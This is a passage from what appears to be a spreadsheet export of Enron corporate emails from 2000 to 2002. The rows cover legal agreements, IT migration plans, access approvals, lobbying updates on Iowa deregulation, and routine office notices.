Delaware_x000D_
Depository:_x000D_
DELAWARE DEPOSITORY SERVICE COMPANY, LLC_x000D_
3601 NORTH MARKET STREET_x000D_
WILMINGTON, DELAWARE 19802_x000D_
ORDERS: 302-765-3884_x000D_
_x000D_
Facilities:_x000D_
3601 NORTH MARKET STREET_x000D_
WILMINGTON, DELAWARE_x000D_
_x000D_
4200 GOVERNOR PRINTZ BLVD._x000D_
WILMINGTON, DELAWARE_x000D_
_x000D_
_x000D_
Additional Licensed Weighmasters For Silver_x000D_
_x000D_
International Testing Laboratories, Inc._x000D_
578-582 Market Street_x000D_
Newark, NJ 07105_x000D_
Orders: (201) 589-4772_x000D_
_x000D_
Ledoux &amp; Company_x000D_
359 Alfred Avenue_x000D_
Teaneck, NJ 07666_x000D_
Orders: NJ (201) 837-7160_x000D_
_x000D_
_x000D_
___________________________________________________x000D_
Please click on the link below to indicate you have received this_x000D_
email._x000D_
_x000D_
"http://208.206.41.61/email/email_log.cfm?useremail=3Dsara.shackleton@enron=_x000D_
.com&amp;_x000D_
refdoc=3D(00-334)"_x000D_
_x000D_
Note: If you click on the above line and nothing happens, please copy_x000D_
the text between the quotes, open your internet browser,_x000D_
paste it into the web site address and press Return._x000D_
</t>
  </si>
  <si>
    <t>Thu, 10 Aug 2000 08:33:00 -0700 (PDT)</t>
  </si>
  <si>
    <t xml:space="preserve">I don't know Mog Hue.  Please return this request to the person who _x000D_
originated it so that the Manager section can be completed.  By including the _x000D_
manager's name, that will help me to identify who this person is, what job _x000D_
they perform and whether or not the request makes sense.  I have over 400 _x000D_
people in my group, so without more detail on these requests it is not worth _x000D_
taking my time to approve these.  --Sally _x000D_
---------------------- Forwarded by Sally Beck/HOU/ECT on 08/10/2000 03:30 PM _x000D_
---------------------------_x000D_
_x000D_
From:  Information Risk Management/HOU/ECT_x000D_
_x000D_
Subject: Your approval is requested_x000D_
_x000D_
	Security Resource Request System	_x000D_
Application Approval		_x000D_
Please review and act upon this request. You have received this eMail because _x000D_
you are listed as an approver on the original request._x000D_
			Instructions	_x000D_
For: 	Mog Heu                   			_x000D_
Request	Original: 			_x000D_
Application Name:	EOL - Risk Management			_x000D_
Request Type:	Grant			_x000D_
Role(s):	Application Product Data Manager			_x000D_
Comments:	copied from ARSystem to SRRS System for approval		Review the request in the _x000D_
Request section at left._x000D_
			For more information regarding who the request is for, do the following:_x000D_
			Click on the name for PeopleFinder info_x000D_
			See the Further Information section below_x000D_
			In the Approval Section, select Approve or Reject, enter comments as _x000D_
necessary and click [Submit].	_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
	Further Information		_x000D_
	         		_x000D_
Requestor:			Mog Heu/NA/Enron_x000D_
Manager:			_x000D_
Request Date:	08/09/2000 06:08:02 PM		_x000D_
RC #:	104503	WO #:	_x000D_
Company #:	0413	Priority:	Normal_x000D_
General Comments:			</t>
  </si>
  <si>
    <t>Fri, 12 Oct 2001 06:30:45 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'kay.quigley@enron.com'})</t>
  </si>
  <si>
    <t>Mackenzie Reeves</t>
  </si>
  <si>
    <t xml:space="preserve">she is so beautiful..My main goal today is to be nice and loving- qualities definitely not evident in my tantrums yesterday- ily kq_x000D_
---------------------- Forwarded by Kay Quigley/HOU/EES on 10/12/2001 08:28 AM ---------------------------_x000D_
_x000D_
_x000D_
Harry &amp; Jo Pelphrey &lt;harryjo@postoffice.swbell.net&gt; on 10/11/2001 10:05:47 PM_x000D_
Please respond to harryjo@swbell.net_x000D_
To:	kquigley@enron.com_x000D_
cc:	p.reeves@hobbylobby.com, ark@icnet.net, "Reeves, Dale &amp; Tracey" &lt;treevescincy@att.net&gt; _x000D_
Subject:	Mackenzie Reeves_x000D_
_x000D_
_x000D_
Hi K-Kay,_x000D_
_x000D_
Amy asked me to attempt to send you a picture of Mackenzie.  Let me know_x000D_
if you have trouble_x000D_
opening this file._x000D_
_x000D_
Come see us!_x000D_
_x000D_
Aunt JoJo_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
 - image014.bmp _x000D_
</t>
  </si>
  <si>
    <t>Mon, 13 Nov 2000 09:26:00 -0800 (PST)</t>
  </si>
  <si>
    <t>nov_1_1</t>
  </si>
  <si>
    <t>Susan,_x000D_
_x000D_
Please see the attached file. I got to leave, if you have any questions, I'll _x000D_
answer it first thing tomorrow mornning..._x000D_
_x000D_
Shouan</t>
  </si>
  <si>
    <t>Tue, 22 Aug 2000 08:52:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>RE: ISDA</t>
  </si>
  <si>
    <t xml:space="preserve">Tana, a little while back I requested you send Air Liquide a sample ISDA _x000D_
which I know you did....  since then they have "lost" it so would you be so _x000D_
kind as to send them another one.  If you need any additional information or _x000D_
whatever please let me know.   Thanks Again !!   John _x000D_
---------------------- Forwarded by John Malowney/HOU/ECT on 08/22/2000 05:57 _x000D_
PM ---------------------------_x000D_
   _x000D_
	Enron Capital &amp; Trade Resources Corp._x000D_
	_x000D_
	From:  "Darnell, Mark" &lt;Mark.Darnell@Airliquide.com&gt;                          _x000D_
 08/22/2000 03:00 PM_x000D_
	_x000D_
_x000D_
To: "'John Malowney'" &lt;John.Malowney@enron.com&gt;_x000D_
cc:  _x000D_
Subject: RE: ISDA_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
yes, are prices coming down yet? _x000D_
_x000D_
Mark Darnell _x000D_
Energy Manager _x000D_
Air Liquide America _x000D_
(713) 624-8342 telephone _x000D_
(713) 624-8350 facsimile _x000D_
(888) 751-4837 pager _x000D_
_x000D_
-----Original Message----- _x000D_
From: John Malowney [mailto:John.Malowney@enron.com] _x000D_
Sent: Tuesday, August 22, 2000 4:53 PM _x000D_
To: Darnell, Mark _x000D_
Subject: Re: ISDA _x000D_
_x000D_
_x000D_
_x000D_
Do we need to send you another one ?? _x000D_
_x000D_
_x000D_
????????????????????????????????????????????????????? _x000D_
?(Embedded???? Enron Capital &amp; Trade Resources Corp.? _x000D_
?image moved????????????????????????????????????????? _x000D_
?to file:????? From:? "Darnell, Mark"???????????????? _x000D_
?pic11026.pcx) &lt;Mark.Darnell@Airliquide.com&gt;????????? _x000D_
?????????????? 08/22/2000 02:30 PM??????????????????? _x000D_
????????????????????????????????????????????????????? _x000D_
????????????????????????????????????????????????????? _x000D_
????????????????????????????????????????????????????? _x000D_
_x000D_
_x000D_
To:?? John Malowney/HOU/ECT@ECT _x000D_
cc: _x000D_
Subject:? ISDA _x000D_
_x000D_
_x000D_
I don't have it yet. Or I do not know where I placed it. Either way, I dont _x000D_
have it. _x000D_
_x000D_
Mark Darnell _x000D_
Energy Manager _x000D_
Air Liquide America _x000D_
(713) 624-8342 telephone _x000D_
(713) 624-8350 facsimile _x000D_
(888) 751-4837 pager _x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 22 Mar 2001 08:52:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Click Paper Approvals, 03-22-01</t>
  </si>
  <si>
    <t xml:space="preserve">----- Forwarded by Tana Jones/HOU/ECT on 03/22/2001 04:51 PM -----_x000D_
_x000D_
	Aparna Rajaram/ENRON@enronXgate_x000D_
	03/22/2001 04:39 PM_x000D_
		 _x000D_
		 To: Kelly Lombardi/NA/Enron@Enron, Samuel Schott/HOU/ECT@ECT, Bernice _x000D_
Rodriguez/HOU/ECT@ECT, Bill D Hare/HOU/ECT@ect, Steve Venturatos/HOU/ECT@ECT, _x000D_
Camille Gerard/Corp/Enron@ENRON, Samuel Schott/HOU/ECT@ECT, Tanya _x000D_
Rohauer/ENRON@enronXgate, Tom Moran/ENRON@enronXgate, Tana Jones/HOU/ECT@ECT, _x000D_
Frank L Davis/HOU/ECT@ECT, Ken Curry/ENRON@enronXgate, Nicole _x000D_
Hunter/NA/Enron@Enron, Lesli Campbell/ENRON@enronXgate_x000D_
		 cc: _x000D_
		 Subject: Click Paper Approvals, 03-22-01_x000D_
_x000D_
Please see attached._x000D_
_x000D_
_x000D_
_x000D_
Regards,_x000D_
_x000D_
Aparna Rajaram_x000D_
ext. 5-4563_x000D_
</t>
  </si>
  <si>
    <t>Wed, 11 Apr 2001 02:16:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'christy.lobusch@enron.com'})</t>
  </si>
  <si>
    <t>Re: Global Standards Exception Reporting</t>
  </si>
  <si>
    <t xml:space="preserve">I get an error when I launch the program in Access._x000D_
_x000D_
DG_x000D_
_x000D_
_x000D_
   _x000D_
	Enron North America Corp._x000D_
	_x000D_
	From:  Christy Lobusch @ ENRON                           04/10/2001 10:35 AM_x000D_
	_x000D_
_x000D_
To: Phillip M Love/HOU/ECT@ECT, Kam Keiser/HOU/ECT@ECT, David _x000D_
Baumbach/HOU/ECT@ECT, Darron C Giron/HOU/ECT@ECT, Errol _x000D_
McLaughlin/Corp/Enron@ENRON_x000D_
cc: Kelly Tisman/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT _x000D_
Subject: Global Standards Exception Reporting_x000D_
_x000D_
Dear all-_x000D_
_x000D_
I wanted to follow up with you to see if you had started using the Exception _x000D_
reporting databases.  I know that initially we had some security problems, _x000D_
but I think that we resolved those.  I have not seen any files for the gas _x000D_
group, so I wanted to follow up.  Please let me know or if you have any _x000D_
problems, please let myself (ext. 31781) or Kelly (ext. 39962) know.  Thanks, _x000D_
_x000D_
Christy_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 5 Sep 2000 00:20:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'chris.smith@enron.com'})</t>
  </si>
  <si>
    <t>frozenset({'enron.everyone_et&amp;s_houston@enron.com'})</t>
  </si>
  <si>
    <t>GPG Windows 2000/Outlook Project Announcement</t>
  </si>
  <si>
    <t xml:space="preserve">GPG will begin gathering information in September for our migration to=20_x000D_
Windows 2000 and Outlook/Exchange._x000D_
_x000D_
Windows 2000 (or W2K) is Microsoft's newest operating system and has been=_x000D_
=20_x000D_
selected as Enron's standard desktop operating system.  Along with this=20_x000D_
change, we are moving from Lotus Notes to Outlook/Exchange as our standard=_x000D_
=20_x000D_
messaging (email) application. =20_x000D_
_x000D_
This project is a huge undertaking, and we need everyone=01,s assistance to=_x000D_
=20_x000D_
ensure success.  The GPG-IT team will partner with each group to ensure eve=_x000D_
ry=20_x000D_
aspect is covered.   Each group (IT and the User group) will assign a Point=_x000D_
=20_x000D_
of Contact (POC) to  work with the IT group.  The POC's responsibilities=20_x000D_
include application information gathering, identifying security requirement=_x000D_
s,=20_x000D_
documenting all issues and concerns, and communicating project status._x000D_
_x000D_
We are approaching the Windows 2000/Exchange Project in a phased approach._x000D_
_x000D_
Phase I, starting now and running through November, consists of =01&amp;Informa=_x000D_
tion=20_x000D_
Gathering=018 about hardware, applications, issues, as well as application=_x000D_
=20_x000D_
testing in our Windows 2000 lab and user sign-off.  The Phase I findings wi=_x000D_
ll=20_x000D_
determine the Phase II start date._x000D_
_x000D_
Phase II, will be the actual =01&amp;Implementation=018 of desktop hardware, Wi=_x000D_
ndows=20_x000D_
2000 and Outlook software, and user training.  We will also be migrating=20_x000D_
"user" data on the network to a Windows 2000 file server and migrating=20_x000D_
applications to a Windows 2000 application server.=20_x000D_
_x000D_
Some of the benefits of migrating to W2K_x000D_
Increased desktop reliability and response time.  Windows 2000 is much more=_x000D_
=20_x000D_
stable and robust than Windows 95/98/NT._x000D_
Increased system performance because minimum hardware requirements for W2K=_x000D_
=20_x000D_
are 350 MHz and above with 256 MEG memory. =20_x000D_
Increased desktop manageability and enhanced functionality. =20_x000D_
Single sign-on for all users/servers.  No more problems with trying to keep=_x000D_
=20_x000D_
all your LAN and email passwords the same!_x000D_
_x000D_
Some of the impacts to migrating to W2K_x000D_
Some of the old Office (Word, Excel, PowerPoint or Access) documents will=_x000D_
=20_x000D_
need to be updated.  If you have any old documents that you think will not=_x000D_
=20_x000D_
move forward to W2K, please communicate this to your IT POC.=20_x000D_
We are aware that some hardware and applications may have problems running =_x000D_
in=20_x000D_
Windows 2000.  We will work together to find a suitable solution for=20_x000D_
everyone. =20_x000D_
_x000D_
Another communication with much more detail regarding W2K and Outlook will =_x000D_
be=20_x000D_
coming soon. =20_x000D_
_x000D_
If you have any questions, comments or issues, as always, please feel free =_x000D_
to=20_x000D_
contact your GPG support group directly._x000D_
_x000D_
Thanks. =20_x000D_
_x000D_
GPG SOLUTION CENTER  OMAHA HELP DESK_x000D_
x54745     x7454_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 14 Apr 2000 11:15:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'barbara.hueter@enron.com', 'dave.mangskau@enron.com', 'mark.harada@enron.com', 'lon.stanton@enron.com', 'becky.merola@enron.com', 'barton.clark@enron.com', 'richard.shapiro@enron.com', 'scott.stoness@enron.com', 'steven.kean@enron.com', 'buranit.suttabustya@enron.com', 'stephen.plauche@enron.com', 'janine.migden@enron.com', 'daniel.reck@enron.com', 'harry.kingerski@enron.com', 'richard.rathvon@enron.com', 'thomas.reichelderfer@enron.com', 'janel.guerrero@enron.com', 'elizabeth.linnell@enron.com', 'ben.jacoby@enron.com', 'john.moore@enron.com', 'christi.nicolay@enron.com', 'fred.mitro@enron.com', 'roy.boston@enron.com', 'kerry.stroup@enron.com'})</t>
  </si>
  <si>
    <t xml:space="preserve">A wild week in Iowa.  By the end of the day Tuesday, it became clear to all _x000D_
parties that the bill would not be called for a vote.  The customers were _x000D_
unwilling to give anymore on the enviroment issues and the democrats would _x000D_
similarly not back off their positions.  Mid American then switched gears to _x000D_
pull out all the stops on getting labor support in order to trump the enviro _x000D_
supporters.  Mid American put forward a proposal to the unions/legislators _x000D_
that they would commit to build 2 power plants in the state of Iowa (as _x000D_
opposed to developing in Illinois) over the next 5 years that would employ _x000D_
union labor. Mid American also had it's top management making many visits _x000D_
this week---Greg Abel and I believe also David Sokol.  (No Warren Buffet _x000D_
sightings yet!!!!)This offer created a flurry of activity on both sides, but _x000D_
at the end of the day Thursday, the state IBEW group let it be known that _x000D_
they would still not support the bill even with the Mid Am proposal._x000D_
_x000D_
Mid American believes that the Republicans now have a hook to force the _x000D_
democrats into voting for the de reg bill, by saying that if they don't vote _x000D_
affirmative, they are not for economic development in the rural/struggling _x000D_
areas of the state where the power plants would be built.  _x000D_
_x000D_
WHile I may not share Mid American's positive assessment, the proponent's _x000D_
group continues it's advocacy and will meet with legilsators in their _x000D_
districts over the weekend. The senate leadership agreed to hold off _x000D_
reconvening the committee until Monday afternoon in an effort to allow any _x000D_
last minute maneuvering over the week end._x000D_
---------------------- Forwarded by Susan M Landwehr/HOU/EES on 04/14/2000 _x000D_
05:43 PM ---------------------------_x000D_
_x000D_
_x000D_
Susan M Landwehr_x000D_
04/10/2000 11:15 PM_x000D_
To: Richard Shapiro/HOU/EES@EES, Harry Kingerski/HOU/EES@EES, Janine _x000D_
Migden/DUB/EES@EES, Becky L Merola/DUB/EES@EES, Mark Harada/HOU/EES@EES, _x000D_
Scott Stoness/HOU/EES@EES, Ajit Gill/HOU/EES@EES, Richard D _x000D_
Rathvon/HOU/EES@EES, Barton Clark/HOU/ECT@ECT, John Moore/Corp/Enron@Enron, _x000D_
Ben Jacoby/HOU/ECT@ECT, Stephen Plauche/Corp/Enron@Enron, Fred _x000D_
Mitro/HOU/ECT@ECT, Janel Guerrero/Corp/Enron@Enron, Daniel Reck/HOU/ECT@ECT, _x000D_
Christi L Nicolay/HOU/ECT@ECT, Lon Stanton/ET&amp;S/Enron@Enron, Barbara A _x000D_
Hueter/DUB/EES@EES, Roy Boston/HOU/EES@EES, Kerry Stroup/DUB/EES@EES, _x000D_
dmangsk@enron.com, Thomas S Reichelderfer/DUB/EES@EES, Steven J _x000D_
Kean/HOU/EES@EES, Elizabeth Linnell/HOU/EES@EES_x000D_
cc:  _x000D_
Subject: Iowa de reg update_x000D_
_x000D_
The latest from Des Moines.  The chair(republican) of the Senate committee _x000D_
had a hearing this morning to consider all of the enviromental amendments put _x000D_
forward by the Democrats and it was clear that no Dems would vote for the _x000D_
eventual bill without their amendments, so the chair recessed the committee _x000D_
without a vote.  The committee can be recalled at any time, but the general _x000D_
sense is that it will not be brought back up without at least 2 democrat _x000D_
votes guaranteed.  As is often the case in these debates, the proponents _x000D_
continue to try many strategies, but all of us agree that without direct _x000D_
intervention from Governor Vilsack, the democrats will not come around. As _x000D_
stated in my earlier message, I am not optimistic about passage.  Tempers are _x000D_
running very high and it is very possible that the utilities will try to cut _x000D_
a deal at the last minute that will negatively impact the customers (likely _x000D_
by rate impacts on envriomental/efficiency programs).  Please give me a call  _x000D_
#612-339-4599 if you want any added insight._x000D_
_x000D_
_x000D_
---------------------- Forwarded by Susan M Landwehr/HOU/EES on 04/10/2000 _x000D_
10:47 PM ---------------------------_x000D_
_x000D_
_x000D_
Susan M Landwehr_x000D_
04/05/2000 12:24 PM_x000D_
To: Richard Shapiro/HOU/EES@EES, Harry Kingerski/HOU/EES@EES, Janine _x000D_
Migden/DUB/EES@EES, Becky L Merola/DUB/EES@EES, Mark Harada/HOU/EES@EES, _x000D_
Scott Stoness/HOU/EES@EES, Ajit Gill/HOU/EES@EES_x000D_
cc: Richard D Rathvon/HOU/EES@EES, Barton Clark/HOU/ECT@ECT, John _x000D_
Moore/Corp/Enron@Enron, Ben Jacoby/HOU/ECT@ECT, Stephen _x000D_
Plauche/Corp/Enron@Enron, Fred Mitro/HOU/ECT@ECT, Janel Guerrero/HOU/EES@EES, _x000D_
Daniel Reck/HOU/ECT@ECT, Christi L Nicolay/HOU/ECT@ECT, Lon _x000D_
Stanton/ET&amp;S/Enron@Enron, Barbara A Hueter/DUB/EES@EES, Roy _x000D_
Boston/HOU/EES@EES, Kerry Stroup/DUB/EES@EES, dmangsk@enron.com, Thomas S _x000D_
Reichelderfer/DUB/EES@EES _x000D_
Subject: Iowa de reg update_x000D_
_x000D_
The Iowa customer choice bill has run into some significant roadblacks the _x000D_
last few days due to the political maneuvering of the Democrats.  As you will _x000D_
recall, the House Republicans have always stated that they needed Democrat _x000D_
votes in order to bring the matter to the floor for a vote.  Despite Governor _x000D_
Vilsack's stated support for the measure last week as well as last weekend, _x000D_
the House  Democrat leadership is unwilling to push their members, as they _x000D_
want to use this bill against the Republicans in the House races this fall. _x000D_
(The tactic they will take is that residential rates will rise in the _x000D_
Southeastern part of the state due to the Republicans passing the bill)._x000D_
_x000D_
The primary issue that the Dems are using as a reason not to vote for the _x000D_
bill is that the enviromental protections/funds are not high enough.  The _x000D_
Republicans are unhappy about the exhorbitant amount of funds and the RPS _x000D_
that are already in the bill, and are not willing to vote for an amended bill _x000D_
that the Dems are pushing for.  The enviros and the unions are, as they have _x000D_
been for the last 6 months, the dividing force in this debate._x000D_
_x000D_
Therefore, the proponents coalition moved their efforts to the Senate, with _x000D_
the hope of getting a vote out this week and then move it back over to the _x000D_
HOuse.  While we had a good commitment from Senate leadership (both Dems and _x000D_
Republicans) on Monday, that support has eroded as of this morning.  We are _x000D_
trying a number of tactics, and hope that there will be some positive _x000D_
movement today and tomorrow.  Without the Governor stepping up to the plate _x000D_
and "encouraging" the democrats to gather the number of democrat votes _x000D_
neccessary this week, I am not optimistic about passage._x000D_
_x000D_
There are still two-three weeks of session left, so this debate could rage _x000D_
until then, but my sense is that if we don't get something out of the Senate _x000D_
by the end of this week or early next week, we'll be dead.  Call if you have _x000D_
any questions._x000D_
#612-339-4599_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 25 Jun 2001 08:02:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>EB 3143C - meet w/ Casey, John, Donnie</t>
  </si>
  <si>
    <t>Room per Chaun - 3-3404</t>
  </si>
  <si>
    <t>Fri, 25 Jan 2002 14:00:56 -0800 (PST)</t>
  </si>
  <si>
    <t>Subpoena Response Team</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
David Grant has assembled a team to work on gathering documents in response to the numerous subpoenas the company is receiving from Congress, the SEC and the Department of Justice. Please cooperate with the team if they need your assistance.  If you have any questions, please call David Grant at 3-6239. </t>
  </si>
  <si>
    <t>Mon, 12 Nov 2001 15:25:57 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'lee.huber@enron.com'})</t>
  </si>
  <si>
    <t>RE: Aquila Confidentiality Agreement</t>
  </si>
  <si>
    <t>your WHEREAS clause is fine._x000D_
We can develop a list but again it usually  only covers a specific transaction_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	McConnell, Mark  _x000D_
Sent:	Monday, November 12, 2001 4:58 PM_x000D_
To:	Huber, Lee_x000D_
Subject:	RE: Aquila Confidentiality Agreement_x000D_
_x000D_
_x000D_
I'll change the "Transaction" definition and the first WHEREAS to:_x000D_
_x000D_
WHEREAS.....relating to the possible purchase by Transwestern of Company's weather derivative product (the "Transaction").  Is this okay?_x000D_
_x000D_
When I was working on the VOD team at EBS, we talked with so many companies (as did other groups within EBS).  It was handy to know who was tied to us with a conf. agreement.  I thought it might be helpful here too. _x000D_
_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Huber, Lee  _x000D_
Sent:	Monday, November 12, 2001 4:15 PM_x000D_
To:	McConnell, Mark_x000D_
Subject:	RE: Aquila Confidentiality Agreement_x000D_
_x000D_
You need to change the definition of Transaction in the first WHEREAS clause and then you can send it._x000D_
_x000D_
I could put together a list we have copies of them in the legal dept.  What do you want to use the list for??_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	McConnell, Mark  _x000D_
Sent:	Monday, November 12, 2001 4:07 PM_x000D_
To:	Huber, Lee_x000D_
Subject:	Aquila Confidentiality Agreement_x000D_
_x000D_
_x000D_
Lee,_x000D_
_x000D_
I made the changes to the Duke confidentiality agreement that you sent me, basically just the name changes.  Is there anything else I need to do, or can I just print this out and send it to them?  Please let me know._x000D_
_x000D_
Also,  Is there a list of companies that have a confientiality agreement with Transwestern?_x000D_
_x000D_
 &lt;&lt; File: Aquila confident 11-01.doc &gt;&gt; _x000D_
_x000D_
_x000D_
Mark McConnell_x000D_
Transwestern Pipeline Company_x000D_
713-345-7896   office_x000D_
713-822-4862   cell_x000D_
713-646-2551   fax_x000D_
mark.mcconnell@enron.com</t>
  </si>
  <si>
    <t>Mon, 18 Feb 2002 17:50:18 -0800 (PST)</t>
  </si>
  <si>
    <t>?</t>
  </si>
  <si>
    <t>hole, anything happening with that trailer??</t>
  </si>
  <si>
    <t>Mon, 26 Nov 2001 08:26:03 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'stephanie.truss@enron.com'})</t>
  </si>
  <si>
    <t>frozenset({'keegan.farrell@enron.com', 'b..hearn@enron.com', 'g..rigby@enron.com', 'genia.fitzgerald@enron.com', 'b..sanders@enron.com', 'renee.alfaro@enron.com', 'h..moore@enron.com', 'steve.van@enron.com', 'john.boomer@enron.com', 'carlos.sole@enron.com', 'lou.stoler@enron.com', 'carolyn.george@enron.com', 'shonnie.daniel@enron.com', 'stephanie.panus@enron.com', 'mark.greenberg@enron.com', 'stephanie.truss@enron.com', 'gerald.nemec@enron.com', 'sara.shackleton@enron.com', 'robbi.rossi@enron.com', 'e..crady@enron.com', 'janette.elbertson@enron.com', 'randy.pais@enron.com', 'kathleen.carnahan@enron.com', 'mary.ogden@enron.com', 'suzanne.adams@enron.com', 'cheryl.costa@enron.com', 'samantha.boyd@enron.com', 'martha.keesler@enron.com', 'j..heinitz@enron.com', 'susan.laird@enron.com', 'tim.landry@enron.com', 'peter.del@enron.com', 'j..simmons@enron.com', 'cheryl.lindeman@enron.com', 'roseann.engeldorf@enron.com', 'r..guinn@enron.com', 'theresa.zucha@enron.com', 'susan.bailey@enron.com', 'marcus.nettelton@enron.com', 'sheila.tweed@enron.com', 'coralina.rivera@enron.com', 'diane.goode@enron.com', 'r..rogers@enron.com', 'ebs &lt;.cooper@enron.com&gt;', 'a..robison@enron.com', 'claudia.santos@enron.com', 'mayra.mendez@enron.com', 'legal &lt;.taylor@enron.com&gt;', 'tammy.brennig@enron.com', 'g..bushman@enron.com', 'nita.garcia@enron.com', 'wayne.gresham@enron.com', 'vanessa.griffin@enron.com', 'joseph.henry@enron.com', 'kay.mann@enron.com', 'c..koehler@enron.com', 'kristi.dobbs@enron.com', 'julia.murray@enron.com', 'david.portz@enron.com', 'alan.aronowitz@enron.com', 'd..barto@enron.com', 'lizzette.palmer@enron.com', 'h..george@enron.com', 'leslie.hansen@enron.com', 'pinto.leite@enron.com', 'sandy.haldeman@enron.com', 'kimberley.jacobson@enron.com', 'jim.desrochers@enron.com', 'nancy.corbet@enron.com', 'sarah.bruck@enron.com', 'shirley.oliver@enron.com', 'cynthia.harkness@enron.com', 'becky.spencer@enron.com', 'scott.dieball@enron.com', 'barton.clark@enron.com', 'laurie.mayer@enron.com', 'joanne.garner@enron.com', 'gail.brownfeld@enron.com', 'angela.davis@enron.com', 'maryhelen.martinez@enron.com', 'robert.sevitz@enron.com', 'kay.young@enron.com', 'joanne.rozycki@enron.com', 'legal &lt;.schuler@enron.com&gt;', 'angie.chappell@enron.com', 'debra.perlingiere@enron.com', 'e..dickson@enron.com', 'reginald.shanks@enron.com', 'nony.flores@enron.com', 'holly.keiser@enron.com', 'cheryl.nelson@enron.com', 'michelle.cash@enron.com', 'lisa.mellencamp@enron.com', 'dominic.carolan@enron.com', 'travis.mccullough@enron.com', 'larry.bishop@enron.com', 'wyndel.mcnamara@enron.com', 'alice.wright@enron.com', 'brent.hendry@enron.com', 'michelle.hicks@enron.com', 'eddy.daniels@enron.com', 't..hodge@enron.com', 'mark.cook@enron.com', 'karen.boehnke@enron.com', 'deb.korkmas@enron.com', 'andrew.edison@enron.com', 'twanda.sweet@enron.com', 'martha.braddy@enron.com', 'elizabeth.sager@enron.com', 'n..gray@enron.com', 'john.viverito@enron.com', 'esmeralda.gonzalez@enron.com', 'dan.lyons@enron.com', 'carol.st.@enron.com', 'frank.sayre@enron.com', 'michelle.blaine@enron.com', 'marie.heard@enron.com', 'robin.hill@enron.com', 'tana.jones@enron.com', 'margaret.doucette@enron.com', 'robert.bruce@enron.com', 'john.schwartzenburg@enron.com', 'w..haas@enron.com', 'harlan.murphy@enron.com'})</t>
  </si>
  <si>
    <t>Adopt a Kid - Reminder</t>
  </si>
  <si>
    <t xml:space="preserve"> _x000D_
_x000D_
 Enron Kids _x000D_
No donation is too small!  _x000D_
Please contact Stephanie Truss, 5-3861, or Martha Keesler, 5-2423, to make a cash donation.  The deadline for making your cash donation is Thursday, December 6, 2001.  _x000D_
EWS Legal _x000D_
Gordon Elementary School Adoption</t>
  </si>
  <si>
    <t>Fri, 6 Jul 2001 07:47:54 -0700 (PDT)</t>
  </si>
  <si>
    <t>FW: Final Schedule - Monday, July 2, 2001 - George T. Phillips</t>
  </si>
  <si>
    <t>Don/Juan:_x000D_
_x000D_
Any interest?_x000D_
_x000D_
Thanks,_x000D_
Johnny_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Delgado, Lydia  _x000D_
Sent:	Thursday, June 28, 2001 2:55 PM_x000D_
To:	Baughman Jr., Don; Hernandez, Juan; Forney, John M._x000D_
Cc:	Palmer, Johnny; Arguijo, Cheryl; Black, Tamara Jae; Phillips, George_x000D_
Subject:	Final Schedule - Monday, July 2, 2001 - George T. Phillips_x000D_
Importance:	High_x000D_
_x000D_
Attached please find the following documents:_x000D_
_x000D_
_x000D_
	 	 	 _x000D_
_x000D_
_x000D_
Thanks,_x000D_
Lydia_x000D_
_x000D_
x3-9338</t>
  </si>
  <si>
    <t>Sun, 28 Jan 2001 12:56:00 -0800 (PST)</t>
  </si>
  <si>
    <t>&lt;&lt;Concur Expense Document&gt;&gt; - General Expenses</t>
  </si>
  <si>
    <t xml:space="preserve">----- Forwarded by Steven J Kean/NA/Enron on 01/28/2001 08:56 PM -----_x000D_
_x000D_
	Expense Server@Enron_Development_x000D_
	01/02/2001 01:28 PM_x000D_
		 _x000D_
		 To: Steven J Kean/NA/Enron@Enron_x000D_
		 cc: _x000D_
		 Subject: &lt;&lt;Concur Expense Document&gt;&gt; - General Expenses_x000D_
_x000D_
The following expense report is ready for approval:_x000D_
_x000D_
Employee Name: John Hardy Jr Jr._x000D_
Status last changed by:  Automated Administrator_x000D_
Expense Report Name: General Expenses_x000D_
Report Total: $5,239.11_x000D_
Amount Due Employee: $346.02_x000D_
_x000D_
_x000D_
To approve this expense report, click on the following link for Concur _x000D_
Expense._x000D_
http://nahou-wwxms01p_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 5 Dec 2000 10:26:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'dtang@cinergy.com'})</t>
  </si>
  <si>
    <t xml:space="preserve">David:_x000D_
Here are answers to the second batch of questions.  Please give Don Miller a _x000D_
call if you have any additional questions.  Thanks!_x000D_
Ben_x000D_
</t>
  </si>
  <si>
    <t>Wed, 17 May 2000 02:49:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'michael.moulton@enron.com'})</t>
  </si>
  <si>
    <t>Great words</t>
  </si>
  <si>
    <t xml:space="preserve">Mike, I forwarded your interest to Whalley, McConnel and McMahon.  Any=20_x000D_
technology effort really should be lead by NetWorks.  This is consistent wi=_x000D_
th=20_x000D_
Skillings strategy and what has been communicated to the analysts.  You=20_x000D_
should receive a call from one of these gentlemen._x000D_
_x000D_
Regards_x000D_
Delainey_x000D_
---------------------- Forwarded by David W Delainey/HOU/ECT on 05/17/2000=_x000D_
=20_x000D_
09:46 AM ---------------------------_x000D_
  =20_x000D_
=09_x000D_
=09_x000D_
=09From:  Michael Moulton @ ENRON                           05/15/2000 07:5=_x000D_
1 AM_x000D_
=09_x000D_
_x000D_
